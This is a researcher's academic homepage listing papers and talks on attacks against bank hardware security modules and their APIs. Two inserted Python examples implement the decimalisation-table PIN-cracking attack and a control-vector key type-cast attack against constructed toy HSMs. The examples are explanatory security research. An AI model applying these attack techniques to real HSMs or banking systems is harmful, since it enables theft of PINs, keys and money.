Mike Bond
University of Cambridge - Computer Laboratory
Email : Mike.Bond@cl.cam.ac.uk
Phone : +44 (0)1223 7-63571
Mobile: +44 (0)7890 171913
Fax : +44 (0)1223 3-34678
"The only way to understand the wheel is to reinvent it." -- Me (I think!)
Research - Overview, Publications and Seminars
My research is all about "Understanding Security APIs". I am concerned with learning how to defeat, design, analyse and
verify any sort of Security API. You can find a list of my publications, seminars, and a whole load of technical details and
resources further down the page. Most of the APIs I am examining belong to cryptoprocessors. Cryptoprocessors are tamper-resistant
processors first conceived by banks and the military to protect sensitive information from physical attack - the big brothers of
tamper-resistant smartcards. Cryptoprocessors are rapidly becoming more widespread, as corporations start using them to protect their
PKIs, and manufacturers are examining how they can be used to enforce accessory control and new marketing models. I am currently
exploring how existing APIs can be defeated purely by using the constituent commands in unexpected ways or sequences.
Jolyon Clulow's MSc thesis, "The Design and Analysis of Cryptographic APIs for
Security Devices" (1.6MB), available at http://home.icon.co.za/~clulow, may be of
interest to those looking at PIN processing API attacks. Jolyon is now a member of the Computer Security group, and his website is here.
If you are here following up IBM's CCA release - Version 2.41, then head for a brief comment upon the fixes.
Full information on the November '01 media coverage of my work with Richard Clayton on banking security and DES cracking hardware is
at http://www.cl.cam.ac.uk/~rnc1/descrack. Check out my media page as well.
Publications Quick Find
On the Security of the EMV Secure Messaging API | Apr 2007 | PDF File (375k) |
Boom! Headshot! | Oct 2006 | PDF File (176k) |
A Pact with the Devil | August 2006 | PDF File (118k) |
Integrity of Intention (A Theory of Types for Security APIs) | May 2006 | PDF File (168k) |
A Note on EMV Secure Messaging in the IBM 4758 CCA | Mar 2006 | PDF File (188k) |
The Man-in-the-Middle Defence | Mar 2006 | PDF File (65k) |
Phish and Chips | Mar 2006 | PDF File (196k) |
Laser-printed PIN Mailer Vulnerability Report | Jul 2005 | PDF File (750k) |
The Dining Freemasons | April 2005 | PDF File (95k) |
Cryptographic Processors -- A Survey | April 2005 | PDF File (450k) |
Encrypted? Randomised? Compromised? (When Cryptographically Secured Data is Not Secure) | July 2004 | PDF File (137k) |
Extending Security Protocols Analysis : New Challenges | July 2004 | PDF File (150k) |
Understanding Security APIs | June 2004 | PDF File (1.8MB) |
Unwrapping the Chrysalis | June 2004 | PDF File (150k) |
Decimalisation Table Attacks for PIN Cracking | Feb 2003 | PDF File (132k) |
Protocol Analysis, Composability and Computation | Jan 2003 | PDF File (50k) |
Experience Using a Low-Cost FPGA Design to Crack DES Keys | August 2002 | PDF File (166k) |
API Level Attacks on Embedded Systems | May 2001 | PDF File (126k) |
Attacks on Cryptoprocessor Transaction Sets | Feb 2001 | PDF File (140k) |
A Chosen Key Difference Attack on Control Vectors | Nov 2000 | PDF File (17k) |
IBM Comment on 'A Chosen Key Difference Attack on Control Vectors' | Jan 2001 | PDF File (32k) |
Full Publications List with Abstracts
- Laser-printed PIN Mailer Vulnerability Report
Jul 2005, jointly with
Steven Murdoch and Jolyon Clulow
Abstract
Tamper-evident laser-printed PIN mailers are used by many
institutions to issue PINs and other secrets to individuals in a secure
manner. Such mailers are created by printing the PIN using a normal
laser, but on to special stationery and using a special font. The background
of the stationery disguises the PIN so that it cannot be read
with the naked eye without tampering. We show that currently deployed
PIN mailer technology (used by the major UK banks) is vulnerable to
trivial attacks that reveal the PIN without tampering. We describe image
processing attacks, where a colour difference between the toner and
the stationery masking pattern is exploited. We also describe angled
light attacks, where the reflective properties of the toner and stationery
are exploited to allow the naked eye to separate the PIN from the backing
pattern. All laser-printed mailers examined so far have been shown
insecure.
Download this paper as a PDF file (750k)
- The Dining Freemasons
21st April 2005, jointly with
George Danezis,
International Security Protocols Workshop, Cambridge
UK
Abstract
We continue the popular theme of offline security by considering
how computer security might be applied to the challenges presented
in running a secret society. We discuss membership testing problems
and solutions, set in the context of security authentication
protocols, and present new building blocks which could be used to
generate secret society protocols more robustly and generically,
including the lie channel and the compulsory arbitrary
decision model.
Download this paper as a PDF file (95k)
- Cryptographic Processors -- A Survey
April 2005, jointly with
Ross Anderson,
Jolyon Clulow,
Sergei Skorobogatov
IEEE Special Issue (to appear)
Abstract
Tamper-resistant cryptographic processors are becoming the standard way to enforce data-usage policies. Their history began with military cipher machines, and hardware security modules used to authenticate themselves to ATMs. In both cases, the designers wanted to prevent abuse of data and key material should a device fall into the wrong hands. From these specialist beginnings, cryptoprocessors spread into devices such as prepayment electricity meters, and the vending machines that sell credit for them. In the 90s, tamper-resistant smartcards became integral to GSM mobile phone identification and to key management in pay-TV set-top boxes, while secure microcontrollers were used in remote key entry devices for cars. In the last five years, dedicated crypto chips have been embedded in devices from games console accessories to printer ink cartridges, to control product and accessory aftermarkets. The "Trusted Computing" initiative will soon embed cryptoprocessors in PCs so that they can identify each other remotely. This paper surveys the range of applications of tamper-resistant hardware, and the array of attack and defence mechanisms which have evolved in the tamper-resistance arms race.
Download this paper as a PDF file (450k)
- Encrypted? Randomised? Compromised? (When Cryptographically Secured Data is Not Secure)
6th July 2004, jointly with Jolyon Clulow
Cryptographic Algorithms and Their Uses, Eracom Workshop 2004, Queensland Australia
Abstract
Protecting data is not simply a case of encrypt and forget: even data with full cryptographic confidentiality and
integrity protection can still be subject to information leakage. We consider the issue of information leakage through
side channels in protocols. Previous work by Bond and Clulow identified multiple vulnerabilities in APIs for financial PIN
processing systems, and suggested remedies; however our work here shows that the fixes do not work, and that the problem
of information leakage in these APIs has still not been adequately addressed. We argue that information flow and leakage
analysis will play an important role in the security of encrypted databases in the future.
Download this paper as a PDF file (137k)
- Extending Security Protocols Analysis : New Challenges
4th July 2004, jointly with Jolyon Clulow
Automated Reasoning and Security Protocols Analysis 2004, Cork, Ireland
Abstract
We argue that formal analysis tools for security protocols are not achieving their full potential, and give only
limited aid to designers of more complex modern protocols, protocols in constrained environments, and security APIs.
We believe that typical assumptions such as perfect encryption can and must be relaxed, while other threats, including
the partial leakage of information, must be considered if formal tools are to continue to be useful and gain widespread,
real world utilisation. Using simple example protocols, we illustrate a number of attacks that are vital to avoid in
security API design, but that have yet to be modelled using a formal analysis tool. We seek to extract the basic ideas
behind these attacks and package them into a wish list of functionality for future research and tool development.
Download this paper as a PDF file (150k)
- Understanding Security APIs
1st June 2004, PhD thesis, University of Cambridge Computer Laboratory
Abstract
This thesis introduces the newly-born field of Security API research, and lays the foundations for future analysis,
study, and construction of APIs. Security APIs use cryptography to enforce a security policy on the users of the API,
governing the way in which they manipulate sensitive data and key material. The thesis begins examining the origins and
history of Security APIs, and that of HSMs -- tamper-resistant cryptographic processors which implement the APIs. The
key contribution is a catalogue of new attacks and attack techniques for Security APIs, including both historic attacks
and new unpublished work. The thesis goes on to provide a body of advice for Security API design, consisting of
heuristics and discussions of key issues, including those most pertinent to modern HSMs such as authorisation and trusted
paths. The advice is linked in with the cautionary tales of Security API failures from the previous chapters. As the
thesis is opening a new field of academic research, its main objective is to build understanding about Security APIs.
Download the core chapters (3, "Origins of Security API Attacks", together with 7 and 10) as a PDF file (700k)
Download the entire thesis as a PDF file (1.8MB)
Disclaimer: This thesis was produced to satisfy an examination committee, rather than directly for peers, and as
such, the material may not be optimally presented for purposes of future research and industrial interaction. In due
course I hope to release a new slightly improved version. The fundamental content will remain the same of course!
- Unwrapping the Chrysalis
1st June 2004, jointly with Steven Murdoch and Daniel Cvrcek, Computer Laboratory Technical Report TR-592
Abstract
We describe our experiences reverse engineering the Chrysalis-ITS Luna CA3 - a PKCS#11 compliant cryptographic
token. Emissions analysis and security API attacks are viewed by many to be simpler and more efficient than a direct
attack on an HSM. But how difficult is it to actually "go in the front door"? We describe how we unpicked the CA3
internal architecture and abused its low-level API to impersonate a CA3 token in its cloning protocol - and extract
PKCS#11 private keys in the clear. We quantify the effort involved in developing and applying the skills necessary
for such a reverse-engineering attack. In the process, we discover that the Luna CA3 has far more undocumented code
and functionality than is revealed to the end-user, and discuss the impact of this on the security of the token.
Download this paper as a PDF file (345k). (Sample code also available here).
- Decimalisation Table Attacks for PIN Cracking
February 2003, jointly with Piotr Zielinski, a Computer Laboratory Technical Report
Abstract
We present an attack on hardware security modules used by retail banks for the secure storage and verification
of customer PINs in ATM (cash machine) infrastructures. By using adaptive decimalisation tables and guesses, the
maximum amount of information is learnt about the true PIN upon each guess. It takes an average of 15 guesses to
determine a four digit PIN using this technique, instead of the 5000 guesses intended. In a single 30 minute
lunch-break, an attacker can thus discover approximately 7000 PINs rather than 24 with the brute force method.
With a £300 withdrawal limit per card, the potential bounty is raised from £7200 to £2.1 million and a single
motivated attacker could withdraw £30-50 thousand of this each day. This attack thus presents a serious threat
to bank security.
Download this paper as a PDF file (132k)
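As an added illustration of the attack this abstract describes (not code from the paper, nor from any bank or HSM vendor), the following Python models an IBM 3624-style PIN verification command and runs the basic two-stage form of the decimalisation table attack against it. The HSM class, its PIN derivation key and the PAN are constructed stand-ins, and SHA-256 replaces the DES encryption of the validation data; that substitution is an assumption that does not change the attack, which needs only that the decimalisation table and offset are caller-supplied and that the HSM answers yes or no. Stage 1 sends a "binary" table that maps one hex digit to 1 and every other digit to 0 with trial PIN 0000, so a failed verification reveals that the digit occurs in the intermediate value; stage 2 finds the positions. The paper's adaptive strategy picks the table and trial PIN that maximise information at each step and averages about 15 guesses; this plain version spends 16 on stage 1 and at most 14 more.

```python
"""Decimalisation table attack against a toy IBM 3624-style PIN verify command.

Added example: the HSM, key, PAN and the SHA-256 stand-in for DES are all
constructed for illustration; nothing here is code from the paper.
"""
import hashlib
from itertools import combinations

HEX = "0123456789ABCDEF"
STANDARD_DECTAB = "0123456789012345"   # the usual 3624 table: hex digit -> decimal digit


def intermediate_value(pdk: bytes, pan: str) -> str:
    """Stand-in for the first four hex digits of DES_pdk(validation data).
    Assumption for the example: SHA-256 instead of DES, so it runs offline.
    The attack only relies on the table and offset being caller-supplied."""
    return hashlib.sha256(pdk + pan.encode()).hexdigest()[:4].upper()


def decimalise(hexdigits: str, dectab: str) -> str:
    return "".join(dectab[HEX.index(c)] for c in hexdigits)


def add_offset(natural: str, offset: str) -> str:
    """PIN = natural PIN + offset, digit-wise modulo 10."""
    return "".join(str((int(a) + int(b)) % 10) for a, b in zip(natural, offset))


class ToyHSM:
    """Models the verification command: caller supplies PAN, decimalisation
    table, offset and trial PIN; only a yes/no answer leaves the device."""

    def __init__(self, pdk: bytes):
        self._pdk = pdk
        self.queries = 0

    def verify(self, pan: str, dectab: str, offset: str, trial_pin: str) -> bool:
        self.queries += 1
        natural = decimalise(intermediate_value(self._pdk, pan), dectab)
        return add_offset(natural, offset) == trial_pin


def binary_table(i: int) -> str:
    """Table mapping hex digit i to 1 and all other hex digits to 0."""
    return "".join("1" if x == i else "0" for x in range(16))


def recover_intermediate(hsm: ToyHSM, pan: str) -> str:
    """Two-stage attack: learn which hex digits occur, then where they occur."""
    # Stage 1: with binary_table(i), offset 0000 and trial 0000 the check
    # fails exactly when digit i appears in at least one of the four positions.
    present = [i for i in range(16)
               if not hsm.verify(pan, binary_table(i), "0000", "0000")]
    # Stage 2: guess position sets for each digit found, smallest sets first.
    # The last digit must occupy whatever positions remain, so it costs nothing.
    unresolved = {0, 1, 2, 3}
    digits = [""] * 4
    for k, i in enumerate(present):
        chosen = None
        if k == len(present) - 1:
            chosen = set(unresolved)
        else:
            for size in range(1, len(unresolved)):
                for subset in combinations(sorted(unresolved), size):
                    trial = "".join("1" if p in subset else "0" for p in range(4))
                    if hsm.verify(pan, binary_table(i), "0000", trial):
                        chosen = set(subset)
                        break
                if chosen is not None:
                    break
        if chosen is None:
            raise RuntimeError("inconsistent HSM responses")
        for p in chosen:
            digits[p] = HEX[i]
        unresolved -= chosen
    return "".join(digits)


def recover_pin(hsm: ToyHSM, pan: str, customer_offset: str) -> str:
    """The customer's PIN: standard decimalisation of the recovered value plus
    the offset stored on their card (known to the attacker from track data)."""
    natural = decimalise(recover_intermediate(hsm, pan), STANDARD_DECTAB)
    return add_offset(natural, customer_offset)


if __name__ == "__main__":
    hsm = ToyHSM(b"constructed pin derivation key")   # constructed sample inputs
    pan = "4000123412341234"
    pin = recover_pin(hsm, pan, "0000")
    print("PIN", pin, "recovered after", hsm.queries, "verify calls")
```

While probing, the attacker passes offset 0000 and applies the customer's real offset only at the end; the lesson the abstract draws is that any per-call parameter the caller may vary, here the table and the offset, turns the verify command into an oracle.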
- Protocol Analysis, Composability and Computation
January 2003, jointly with Ross Anderson, a short paper for "Computer Systems: Papers for Roger Needham"
Download the paper as an HTML page (~50k)
- Experience Using a Low-Cost FPGA Design to Crack DES Keys
1st August 2002, jointly with Richard Clayton, presented at the CHES 2002 Workshop in San Francisco
Abstract
This paper describes the authors' experiences attacking the IBM 4758 CCA, used in retail banking to protect
the ATM infrastructure. One of the authors had previously proposed a theoretical attack to extract DES keys from
the system, but it failed to take account of real-world banking security practice. We developed a practical scheme
that collected the necessary data in a single 10-minute session. Risk of discovery by intrusion detection systems
made it necessary to complete the key "cracking" part of the attack within a few days, so a hardware DES cracker
was implemented on a US$995 off-the-shelf FPGA development board. This gave a 20-fold increase in key testing speed
over the use of a standard 800 MHz PC. The attack was not only successful in its aims, but also shed new light on
the protocol vulnerabilities being exploited. In addition, the FPGA development led to a fresh way of demonstrating
the non-randomness of some of the DES S-boxes and indicated when pipelining can be a more effective technique than
replication of processing blocks. The wide range of insights we obtained demonstrates that there can be significant
value in implementing attacks "for real".
Download this paper as a PDF file (166k)
- API Level Attacks on Embedded Systems
2nd May 2001, jointly with Ross Anderson, IEEE Computer Magazine, Oct 2001, pp. 67-75
Abstract
A whole new family of attacks has recently been discovered on the application programming interfaces (APIs)
used by security processors. These extend and generalise a number of attacks already known on authentication
protocols. The basic idea is that by presenting valid commands to the security processor, but in an
unexpected sequence, it is possible to obtain results that break the security policy envisioned by its designer.
Such attacks are economically important, as security processors are used to support a wide range of services,
from automatic teller machines through pay-TV to prepayment utility metering. Designing APIs that resist such
attacks is difficult, as a typical security processor needs a substantial command set with several dozen
commands that allow it to service a number of external and internal protocols. The attacks are also scientifically
interesting; preventing them may become an important new application area for formal methods and
design verification tools generally.
Download an earlier version of this paper as a PDF file (126k)
- Attacks on Cryptoprocessor Transaction Sets
31st January 2001, presented at the CHES 2001 Workshop in Paris
http://www.chesworkshop.org
Abstract
Attacks are presented on the IBM 4758 CCA (the first ever security module to have achieved all round
FIPS 140-1 Level 4 certification) and the Visa Security Module. Two new attack principles are demonstrated.
Related key attacks use known or chosen differences between two cryptographic keys. Data protected with
one key can then be abused by manipulation using the other key. Meet in the middle attacks work by
generating a large number of unknown keys of the same type, thus reducing the key space that must be
searched to discover the value of one of the keys in the type. Design heuristics are presented to avoid
these attacks and other common errors.
Download this paper as a PDF file (140k)
- A Chosen Key Difference Attack on Control Vectors
1st November 2000, unpublished
Abstract
An attack on the implementation of control vectors in the IBM Common Cryptographic Architecture is presented.
The final key part holder in a multiple part import introduces two key encrypting keys (KEKs), one the intended
key and one with a chosen difference from the former, by including this difference in his own key part. When
this difference is set to the difference between two control vectors, keys originally encrypted with the former
KEK can be cast to a new type by importing them under the latter KEK. Thus unauthorised type casts can be made
from an arbitrary source type to any destination type the attacker has permission to use.
Download this paper as a PDF file (17k)
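An added toy model of the type-cast this abstract describes, and of the related-key principle summarised in the CHES 2001 abstract above; it is not IBM's code and uses constructed control-vector values rather than the CCA's real ones. The CCA wraps a key of type CV under KEK xor CV, so the type travels implicitly with the token. Here an 8-byte Feistel network built on SHA-256 stands in for DES (an assumption made so the example runs with the Python standard library), and CV_PIN and CV_DATA are made-up type values. The final key-part holder enters his part once as issued and once xor (CV_PIN xor CV_DATA), so the HSM holds KEK and KEK' = KEK xor CV_PIN xor CV_DATA; a PIN-type token exported under KEK then unwraps as a DATA-type key under KEK', which the attacker is allowed to use.

```python
"""Chosen-key-difference attack on XOR-style control vectors (toy model).

Added example: the Feistel cipher, the control-vector values and the key
parts are constructed for illustration; nothing here is CCA code.
"""
import hashlib

BLOCK = 8   # DES-sized blocks, as in the CCA


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_block_cipher(key: bytes, block: bytes, decrypt: bool = False) -> bytes:
    """8-byte, 8-round Feistel network keyed by `key`; stands in for DES.
    Assumption for the example only: any cipher keyed with (KEK xor CV)
    exhibits the same weakness, because the flaw is in the key algebra."""
    assert len(block) == BLOCK
    left, right = block[:4], block[4:]
    rounds = range(7, -1, -1) if decrypt else range(8)
    if decrypt:
        left, right = right, left
    for r in rounds:
        f = hashlib.sha256(key + bytes([r]) + right).digest()[:4]
        left, right = right, xor(left, f)
    if decrypt:
        left, right = right, left
    return left + right


# Constructed control-vector values for two key types (not the real CCA CVs).
CV_PIN = bytes.fromhex("0000000000000002")    # usable only by PIN commands
CV_DATA = bytes.fromhex("0000000000000003")   # usable by encipher/decipher


def wrap(kek: bytes, cv: bytes, key: bytes) -> bytes:
    """Export: the key is encrypted under KEK xor CV."""
    return toy_block_cipher(xor(kek, cv), key)


def unwrap(kek: bytes, cv: bytes, token: bytes) -> bytes:
    """Import: the HSM believes the result has type `cv`."""
    return toy_block_cipher(xor(kek, cv), token, decrypt=True)


def combine_key_parts(parts) -> bytes:
    """Multi-part key entry: the KEK is the XOR of every part entered."""
    kek = bytes(BLOCK)
    for p in parts:
        kek = xor(kek, p)
    return kek


def chosen_difference_attack(honest_parts, attacker_part, token, token_cv, target_cv):
    """The final part holder re-enters his part xor (token_cv xor target_cv),
    giving KEK' = KEK xor delta.  Unwrapping under KEK' xor target_cv is the
    same operation as unwrapping under KEK xor token_cv, so the key imports
    with the attacker's chosen type."""
    delta = xor(token_cv, target_cv)
    kek_prime = combine_key_parts(list(honest_parts) + [xor(attacker_part, delta)])
    return unwrap(kek_prime, target_cv, token)


def demo():
    """Constructed key parts: two honest officers plus the attacker's part."""
    honest_parts = [bytes.fromhex("0123456789abcdef"), bytes.fromhex("fedcba9876543210")]
    attacker_part = bytes.fromhex("1122334455667788")
    kek = combine_key_parts(honest_parts + [attacker_part])     # the legitimate KEK
    pin_key = bytes.fromhex("a5a5a5a5a5a5a5a5")
    token = wrap(kek, CV_PIN, pin_key)                          # exported as a PIN key
    recovered = chosen_difference_attack(honest_parts, attacker_part, token, CV_PIN, CV_DATA)
    return kek, token, pin_key, recovered


if __name__ == "__main__":
    kek, token, pin_key, recovered = demo()
    print("PIN key imported as DATA key:", recovered == pin_key)
    print("honest DATA-type import gives junk:", unwrap(kek, CV_DATA, token) != pin_key)
```

The honest path (unwrap under KEK with CV_DATA) yields garbage, which is what the control vector is meant to guarantee; the attack works because the key-part entry let one person choose the difference between two KEKs, and XOR makes that difference commute with the control vector.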
- IBM Comment on 'A Chosen Key Difference Attack on Control Vectors'
16th January 2001, IBM's response to my first (unpublished) paper
Download this paper as a PDF file (32k)
Seminars
- Attacks on Cryptoprocessor Transaction Sets
13th February 2001, Security Group Seminar
Computer Laboratory, University of Cambridge
25th April 2001 at COSIC, Katholieke Universiteit Leuven
13th May 2001 at CHES Workshop, Paris
Download the slides as a PDF file (448k)
- A Low-cost Hardware Birthday Attack on DES
5th June 2001, Security Group Seminar
Computer Laboratory, University of Cambridge
(jointly with Richard Clayton)
Download the slides as a PDF file (150k)
- First Steps in Cryptoprocessor API Analysis
24th September 2001, Dagstuhl Seminar
"Specification and Verification of Secure Cryptographic Protocols"
workshop, Schloss Dagstuhl, Germany
Slides to follow shortly
- A Practical Covert-Channel Attack on a Windows Content Protection Product
19th October 2001, Security Group Meeting
Computer Laboratory, University of Cambridge
Slides to follow shortly
- The Benefits and Pitfalls of Cryptographic Hardware
28th January 2002, Information Security Forum 2002
A conference presentation given to the Information Security Forum 2002,
Four Seasons Hotel, Canary Wharf, London
Download the slides as a PDF file (241k)
- The Hazards of Security API Design
10th January 2002, BCS Advanced Programming Seminar
British Computer Society Advanced Programming Specialist Group, London
Download the slides as a PDF file (900k)
- Using Low-cost Cryptographic Hardware to "Rob a Bank"
7th February 2002, MCS School, Oxford
Magdalene College School, Oxford
Download the slides as a PDF file (839k)
- Careers in Computer Science
24th April 2002, King's School, Bruton
King's School, Bruton, Somerset
Slides to follow...
- Experience Using a Low-Cost FPGA to Crack DES Keys
15th August 2002, CHES Workshop, 2002
CHES Workshop, 2002, Redwood City, San Francisco
Slides to follow...
- The Hazards of Security API Design : Special Edition
19th August 2002, TJ Watson Research Labs, IBM
Given to the Security PIC at IBM TJ Watson Research Labs, Hawthorne NY
Slides to follow...
- Hardware Security Modules : Benefits and Pitfalls
4th October 2002, EEMA ISSE 2002, Eurodisney
EEMA Information Security Solutions Europe conference, Eurodisney, 2002
Slides to follow...
- Model Checking Cryptoprocessors : "Why I like the British Museum"
12th November 2002, Security Group Seminar
Computer Laboratory, University of Cambridge
Download the slides as a PDF file (1.4MB). Download a Real Audio file of the talk (warning: not the best sound quality!) here (6.3MB).
- "How to Rob a Bank"
10th December 2002, Emmanuel College MCR Seminar
Emmanuel College, University of Cambridge
Slides might follow...
- "How to avoid a proper job, and still keep busy"
24th February 2003, LCE Seminar
Laboratory for Communications Engineering, University of Cambridge
Slides might follow...
- "Differential Protocol Analysis and API-Level Attacks"
30th April 2003, Security and Protection of Information
Brno Exhibition Centre, Brno, Czech Republic
Slides might follow...
- "Security APIs - Digital Battlefields"
4th November 2003, Information Security Group, University of Bristol
Merchant Venturers Building, University of Bristol
Download the slides as a PDF file (1.7MB)
- "A Monster Emerges from the Chrysalis"
10th February 2004, Security Group Seminar
Computer Laboratory, University of Cambridge
Download the slides as a PDF file (2.3MB). Also read a draft version of a tech report here, and view associated source here.
- "From Cryptography to Robbery in Three Easy Steps"
March 2004, TOC Group Student Seminar
MIT Laboratory for Computer Science
Slides available sometime soon.
- "Security APIs : The last word in ATM security? The first word in TC?"
11th May 2004, Royal Holloway ISG Seminar
Royal Holloway, University of London
Download the slides as a PDF file (1.6MB)
- "HSMs and Security APIs : Enabling Trusted Computing"
30th September 2004, EEMA ISSE 2004, Berlin
EEMA Information Security Solutions Europe conference, Berlin, 2004
Download the slides as a PDF file (590k)
- "Tutorial: Penetrating Secure Hardware"
3rd May 2005, SPI 2005, Brno, Czech Republic
Security and Protection of Information 2005
Download the slides shortly...
Page created : 22nd November '00
Last update : 11th Nov '18
Mike.Bond@cl.cam.ac.uk